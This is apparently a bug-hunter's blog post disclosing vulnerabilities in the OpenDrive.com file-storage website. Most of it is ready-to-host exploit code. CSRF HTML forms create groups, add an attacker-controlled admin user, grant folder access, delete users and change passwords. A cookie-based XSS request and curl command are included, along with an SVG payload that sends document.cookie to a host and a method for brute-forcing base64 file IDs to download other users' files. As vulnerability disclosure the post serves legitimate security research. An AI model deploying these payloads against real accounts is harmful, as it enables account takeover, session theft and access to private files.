Pwning OpenDrive Users

After a long time being away from bug hunting I randomly found these few bugs in the OpenDrive.com website.

If the attacker can run this code while the user is logged in he can create his own Groups in the users section. This is the proof of concept and you will see groups such as “pwned” being created.

XSRF in Creating Groups

<html>
<!-- Discovered by @OsandaMalith-->
  <body>
    <script>
      function submitRequest()
      {
        var xhr = new XMLHttpRequest();
        xhr.open("POST", "https://www.opendrive.com/ajax", true);
        xhr.setRequestHeader("Accept", "application/json, text/javascript, */*; q=0.01");
        xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8");
        xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.8");
        xhr.withCredentials = true;
        var body = "action=create-usergroup&group_name=pwned&group_max_storage=5120&group_bw_max=1024";
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i); 
        xhr.send(new Blob([aBody]));
      }
    </script>
    <form action="#">
      <input type="button" value="Click Here to Pwn" onclick="submitRequest();" />
    </form>
  </body>
</html>

Complete Account Takeover XSRF

An attacker can completely takeover the account of any user once he runs the XSRF exploit in the browser while logged in.

Change the email to a new email account in pwn.html and once the victim executes this code the email will receive full admin rights 🙂 Next execute the GetFolders.html to get full permissions to the victims folders.

The attacker can host these exploits in his server and make the users run them. Please use CSRF tokens to fix this.

File: pwn.html

<html>
<!-- Discovered by @OsandaMalith-->
  <body>
    <form name="0day" action="https://www.opendrive.com/ajax" method="POST">
      <input type="hidden" name="action" value="create-accessuser" />
      <input type="hidden" name="access_first_name" value="Eve" />
      <input type="hidden" name="access_last_name" value="Haxor" />
      <input type="hidden" name="access_password" value="pwned" />
      <input type="hidden" name="access_email" value="youremail@yopmail.com" />
      <input type="hidden" name="access_admin_mode" value="1" />
      <input type="hidden" name="access_notification" value="0" />
      <input type="hidden" name="access_max_storage" value="5120" />
      <input type="hidden" name="access_bw_max" value="1024" />
      <input type="hidden" name="group_id" value="110701" />
      <input type="hidden" name="access_phone" value="123" />
      <input type="hidden" name="access_password_change" value="1" />
      <input type="hidden" name="access_position" value="Tester" />
      <input type="hidden" name="access_send_password" value="1" />
		<input type="submit" value="Click Here to Pwn an account" />
    </form>
  </body>
</html>


Next we take control of all folders. You can clearly see that from the attackers account we were able to access the “confidential.txt” file which was inside the victim’s account.

File: GetFolders

<html>
<!-- Discovered by @OsandaMalith-->
  <body>
    <form name="0day" action="https://www.opendrive.com/ajax" method="POST">
      <input type="hidden" name="action" value="set-folder-access" />
      <input type="hidden" name="access_email" value="haxor15@yopmail.com" />
      <input type="hidden" name="foldersObj[OTZfMTYxOTU0X1ljcFAw]" value="1" />
      <input type="hidden" name="foldersObj[OTZfMTYxOTU1X1FKWFk4]" value="1" />
      <input type="hidden" name="foldersObj[OTZfMTYxOTU2X05DMHlB]" value="1" />
      <input type="hidden" name="foldersObj[OTZfMTYxOTU3X1NKc1Jl]" value="1" />
      <input type="submit" value="Click Here to Pwn the Folders" />
    </form>
  </body>
</html>

Here is a proof of concept video I made to demonstrate this.

Delete Account XSRF

Once a user adds another user into the users list for the deleting option there is no XSRF token used so an attacker can arbitrarily delete the added user by specifying the email.

<html>
  <body>
    <form action="https://www.opendrive.com/ajax" method="POST">
      <input type="hidden" name="action" value="user-delete" />
      <input type="hidden" name="access_email" value="youremail@yopmail.com" />
      <input type="submit" value="Click Here to Delete" />
    </form>
  </body>
</html>

Change Password


We can change the user’s password by the following XSRF exploit.

<html>
  <!-- Discovered by @OsandaMalith -->
  <body>
    <form action="https://www.opendrive.com/settings/profile" method="POST">
      <input type="hidden" name="_wpnonce" value="24ce7b505d" />
      <input type="hidden" name="user_info_old_password" value="OldPassword" />
      <input type="hidden" name="user_info_new_password" value="NewPassword" />
      <input type="hidden" name="user_info_repeat_password" value="NewPassword" />
      <input type="hidden" name="form_action" value="update_password" />
      <input type="submit" value="Change Password" />
    </form>
  </body>
</html>

Cookie Based XSS

I found a Cookie based XSS vulnerability in the domain admin.opendrive.com.

GET /login HTTP/1.1
Host: admin.opendrive.com
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: login_value="><svg/onload="alert('XSS by Osanda')">;
Connection: keep

curl -i -s -k  -X 'GET'  
-H 'User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0' 
-b 'login_value="><svg/onload="alert(1337)">' 
'http://admin.opendrive.com/login' |  grep 1337 

We can steal the session cookies and get access to other accounts. The cookies are not marked as HTTPOnly. Also not marked as Secure.

Here’s a demonstration of stealing the session cookie 🙂

<svg/onload=document.location='http://localhost:8000/?'+document.cookie>

Weak Encoding

I noticed that we can easily bruteforce files.

https://dev.opendrive.com/api/v1/download/file.json/OTZfMzA5NDU1Nl8=?inline=1

Base64 decoded = OTZfMzA5NDU1Nl8 =
96_3094556_

We can bruteforce these values and encode back to base64 and download random files of people.

Advertisements

2 thoughts on “Pwning OpenDrive Users

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s